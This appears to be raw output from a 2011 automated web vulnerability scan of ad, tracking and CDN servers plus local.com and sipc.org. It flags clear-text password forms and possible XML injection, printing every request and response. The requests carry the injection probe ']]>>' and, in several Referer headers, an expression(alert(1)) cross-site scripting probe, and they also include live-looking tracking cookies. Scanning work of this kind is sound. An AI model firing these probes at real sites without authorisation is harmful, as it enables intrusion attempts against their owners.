92067
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /admin/advertisers/indexPl.jsp HTTP/1.1 Host: thestreet.adsonar.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Dallas, TX - Search for local ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Dallas, TX - Search for local ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Amegy Bank in Dallas, TX - ( ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Equity Bank in Dallas, TX - ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Hillcrest Bank in Dallas, TX ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Sterling Bank in Dallas, TX - ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Amegy Bank in Dallas, TX - ( ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Equity Bank in Dallas, TX - ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Hillcrest Bank in Dallas, TX ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Sterling Bank in Dallas, TX - ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Coupons in Dallas, TX | Local ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Dallas Local Events | Find co ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Dallas Theatre and Comedy Eve ...[SNIP]... </p>
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.local.com/results.aspx
The form contains the following password field:
password
Request
GET /results.aspx HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Dallas, TX - Search for Local ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Chicago, IL Local Business Se ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Los Angeles, CA Local Busines ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>New York, NY Local Business S ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us"> <head> <title>Cooking, Nutrition and Food A ...[SNIP]... </p>
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sipc.org/claim/module/login.cfm
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.sipc.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 13:18:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sipc.org/claim/module/login.cfm
The form contains the following password field:
password
Request
GET /index.cfm HTTP/1.1 Host: www.sipc.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 13:50:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen]]>>/log_ut_err.php HTTP/1.1 Host: a.dlqm.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 16:08:39 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=5, max=920 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1052
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen/log_ut_err.php]]>> HTTP/1.1 Host: a.dlqm.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 16:08:41 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=5, max=416 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1052
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen]]>>/st.php?survey_num=865756&site=57865895&code=39213494&randnum=1239703 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-4; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-i
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 16:07:30 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen/st.php]]>>?survey_num=865756&site=57865895&code=39213494&randnum=1239703 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-4; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-i
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 16:07:33 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /pages]]>>/scripts/0011/2796.js HTTP/1.1 Host: dnn506yrbagrg.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.thehealthreport.net/ac-usap.php?sub=xyp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /pages/scripts]]>>/0011/2796.js HTTP/1.1 Host: dnn506yrbagrg.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.thehealthreport.net/ac-usap.php?sub=xyp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /pages/scripts/0011]]>>/2796.js HTTP/1.1 Host: dnn506yrbagrg.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.thehealthreport.net/ac-usap.php?sub=xyp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /pages/scripts/0011/2796.js]]>> HTTP/1.1 Host: dnn506yrbagrg.cloudfront.net Proxy-Connection: keep-alive Referer: http://www.thehealthreport.net/ac-usap.php?sub=xyp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /load]]>>/?p=235&g=001&ctg=Retail+Banks&cat=financial_services&state=TX&city=Dallas&kw=banks HTTP/1.1 Host: loadus.exelator.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: EVX=eJxLtDKyqs60MrIwNTa3tE60MgTxDKyLrQwtrJQMTSxM483jjUxM4w0MDOOBUMm6NtPK2MDI3NyUKMW1ALLGGNA%253D; xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSwsDQ0Mza1rASUAFEE%253D; myPAL=eJx90D0TwiAMgOH%252F0qwMSQoE6FR18c46aPW6Ojo7qv%252Fd0Ert0HPj4OHl45Ziet4TNo%252FEkiqyPkKMkYDQAnqEXgedznDV3BNl5jMT92WCgEjKBIviOTartVitzI6x4ICDqyWaGll0E1s3VttNb%252FbHqzl1g9keOtPuhrzTzgcE%252BXOA%252B7GwYGFifWFeGYUlY0SwwUNeldUI4RS5lEjIbIqUD5Ra38BwZrR67xdS1bw%252F4wdQXA%253D%253D; BFF=eJytksFugzAQRP%252BFL7C9kMXmkjQ9BClQKThRe6o45pxjmn%252FPQoGs0fpAxHVmdtbWvtYZcPeb08olXqu02lprTVJcnU5zLMgAl1RftT8cf34vZVP6pGgdRGc2lmayQWdSkAVm2E5HxSowIzn9l5nSNew%252B%252FNbkGaAdXtgZ0OtMGJOgDGI2M8r6IlaQLiTFilP1LVaQLiQ1%252FReNYIjd%252B2MldpMuJMWK3afQDb3Ok2Y8SLAOAyuoQXZGzzHJXyf3TBprZicLrWBDzjacIxvOsSxwg8KNUSl9%252BU%252Fpzt0M7sjiy%252BWGmYz5DE7OJD5kqntYI1RHGV6O7HJCVwRyOX8r47YyW%252B%252BCFOPl8QSq6EMG; TFF=eJydlEuOgzAMQO%252FSE9hOgu2w4RizZcFipO5mdlXvPobSUMXpKHSBEkXvxR8McybJt5%252BMlC8IcYIBJlWlyzhnyrfvjKM9UdgW2LaDjnfH48qHiid7YuVx0foMWyFWpOzk4O9evpbr%252FLvUd%252BtuELbKYJgAsFU2p8Lb1vN12Ru%252FBsLK46L1GbYydN695kQxvatBjhrkwceDJ0mBtW6Xj%252BRNVA1Mn5gBiDn1mlzEPsPOYurN6jnE0h56OXhp8C4j8XHkdejFDf07Y3unAFOU4f9I5EPtXqdihwC9tz8bgHCuYTt%252FtmGmnWkYcrA5oWZmevDa4F1m6uOU%252F9dD6zPWDzl0kfc%252F%252B2Zmpg%253D%253D
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Thu, 03 Feb 2011 16:16:20 GMT Server: HTTP server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /load]]>>/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0xMTI2LDIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTI1Jm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=149c9c261f7ed36bad90adb9004f3768 HTTP/1.1 Host: loadus.exelator.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDcxMLa1rASUaFEk%253D; myPAL=eJx9kLtuwzAMRf%252FFXDmQ1IOSPLk1CgSIDaR1i6wdM3ds%252B%252B%252BlrNrJEGTS6%252FBQvJ%252BFqXxfCvVfRbR07GOGnDMDkweKBIttJruRrr8UrlismIZ%252FTAmI2DCljZJdtlP3ZM4wv8pSAEnBaUZHolYkPqzW4WnBw%252FyBr9MZn48TDuO5Vvq9QdIHDcIVSzdYatiyYdEwTreYEIFPEeqr3pUwNcn7JkkVa5ItQHU2g8CbkLd%252F%252FxBXLhsXV11es%252FGYRSkwCgmFenAc22IxuBbDONjs42lecDzML1hTsTS6%252FvcPkKZiCA%253D%253D; BFF=eJytk81ugzAQhN%252BFJ%252FBvFptLaKOqSEDVxonSU5Vjzjm2ffeuCSRrtD5Qcf1mPAZ55uyV899XL4UvghSm2zrnVFFdvDQlVChoX3RvfXhtP7%252BOzb4JRXX2RuXObByesSMnKPFqIrjIQZAIsIjNDRMSE%252BqnsFWl1eDGL4yCHjgBk1MLBWBnQtMf2QjkjJON%252BOhObARyxinxf0ExApv93HZsNnLGyUbUOyZbD5w61fQgyXWQSEkMkGcMtCbl48kDQVPM7MlSKbmhJDccMjcccl5NBTTvlTD4yz9CRnUzqlMXHyoV1F2Yn4G7QiB2d1e3Q6XNDbuxuxETEo3vfeCMiGfGpn%252FhjIgJmTruFAgr04RhJUIJm%252BKhWgn%252B5XcJNr%252FL7AqXj275xlac1PIFrTyYldfx3ynkG58pd6bKmeKuU9M%252FggaTAQ%253D%253D; TFF=eJydlDGOxCAMRe8yJzA2xDZpcoxtU6QYabvdbjR3X5JJYARk5GwREaH%252F%252FG1jmCMN8fETHcabAz%252FBAJOq4m2cI8bHPboxfV44LbD9Djo%252BG71b9VTpMX2%252B4jhjNiKt4Cul7Mqhjb18Ld%252Fz71LF1rATiL0yGCYA1yubQ9an31Zfl82Hkas4zpiNSCuDMfaaE%252FpwVoOUGuSl90WPEoi1PorWqSWdKjH%252BhyRA5mAlOYM2Iu35YM3qGGLpD70UvXT0TUbS%252Bsj70Esz9GfEdqYAk5fhsxO2VjtnRNImgDX60QAH1xq26682LGFXGuaY0pxgNzMteu3om8y09cnv1wuzEetFJmPs7ZLQh%252Bul7SBreQIoPwHezL05KjKEug%252FnJBUSAaG%252Bz1ZLcvWg2kmzJ2fQRqQ9Cibl8w%252FsddOa; EVX=eJyNyrsNgDAMRdFdMoE%252Fsey8DGOlTE2JsjsQShp0qyudAcU5IWHqrQ%252Fwc9QPcKBwDUtPqZZEnHelrwklcbefuImT8Re3jfXFdeN1AQqvJDc%253D
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Thu, 03 Feb 2011 16:15:36 GMT Server: HTTP server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /load/net.php]]>>?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0xMTI2LDIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTI1Jm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=149c9c261f7ed36bad90adb9004f3768 HTTP/1.1 Host: loadus.exelator.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDcxMLa1rASUaFEk%253D; myPAL=eJx9kLtuwzAMRf%252FFXDmQ1IOSPLk1CgSIDaR1i6wdM3ds%252B%252B%252BlrNrJEGTS6%252FBQvJ%252BFqXxfCvVfRbR07GOGnDMDkweKBIttJruRrr8UrlismIZ%252FTAmI2DCljZJdtlP3ZM4wv8pSAEnBaUZHolYkPqzW4WnBw%252FyBr9MZn48TDuO5Vvq9QdIHDcIVSzdYatiyYdEwTreYEIFPEeqr3pUwNcn7JkkVa5ItQHU2g8CbkLd%252F%252FxBXLhsXV11es%252FGYRSkwCgmFenAc22IxuBbDONjs42lecDzML1hTsTS6%252FvcPkKZiCA%253D%253D; BFF=eJytk81ugzAQhN%252BFJ%252FBvFptLaKOqSEDVxonSU5Vjzjm2ffeuCSRrtD5Qcf1mPAZ55uyV899XL4UvghSm2zrnVFFdvDQlVChoX3RvfXhtP7%252BOzb4JRXX2RuXObByesSMnKPFqIrjIQZAIsIjNDRMSE%252BqnsFWl1eDGL4yCHjgBk1MLBWBnQtMf2QjkjJON%252BOhObARyxinxf0ExApv93HZsNnLGyUbUOyZbD5w61fQgyXWQSEkMkGcMtCbl48kDQVPM7MlSKbmhJDccMjcccl5NBTTvlTD4yz9CRnUzqlMXHyoV1F2Yn4G7QiB2d1e3Q6XNDbuxuxETEo3vfeCMiGfGpn%252FhjIgJmTruFAgr04RhJUIJm%252BKhWgn%252B5XcJNr%252FL7AqXj275xlac1PIFrTyYldfx3ynkG58pd6bKmeKuU9M%252FggaTAQ%253D%253D; TFF=eJydlDGOxCAMRe8yJzA2xDZpcoxtU6QYabvdbjR3X5JJYARk5GwREaH%252F%252FG1jmCMN8fETHcabAz%252FBAJOq4m2cI8bHPboxfV44LbD9Djo%252BG71b9VTpMX2%252B4jhjNiKt4Cul7Mqhjb18Ld%252Fz71LF1rATiL0yGCYA1yubQ9an31Zfl82Hkas4zpiNSCuDMfaaE%252FpwVoOUGuSl90WPEoi1PorWqSWdKjH%252BhyRA5mAlOYM2Iu35YM3qGGLpD70UvXT0TUbS%252Bsj70Esz9GfEdqYAk5fhsxO2VjtnRNImgDX60QAH1xq26682LGFXGuaY0pxgNzMteu3om8y09cnv1wuzEetFJmPs7ZLQh%252Bul7SBreQIoPwHezL05KjKEug%252FnJBUSAaG%252Bz1ZLcvWg2kmzJ2fQRqQ9Cibl8w%252FsddOa; EVX=eJyNyrsNgDAMRdFdMoE%252Fsey8DGOlTE2JsjsQShp0qyudAcU5IWHqrQ%252Fwc9QPcKBwDUtPqZZEnHelrwklcbefuImT8Re3jfXFdeN1AQqvJDc%253D
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Thu, 03 Feb 2011 16:15:37 GMT Server: HTTP server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /yt/cssbin]]>>/www-embed-vflPrzZNL.css HTTP/1.1 Host: s.ytimg.com Proxy-Connection: keep-alive Referer: http://www.youtube.com/embed/aP2pdXfgWzM?rel=0 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Cache-Control: public, max-age=31104000 Expires: Sun, 26 Dec 2032 06:12:01 GMT Content-Type: text/html Content-Length: 345 Date: Thu, 03 Feb 2011 16:24:18 GMT Server: lighttpd-yt/1.4.18
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
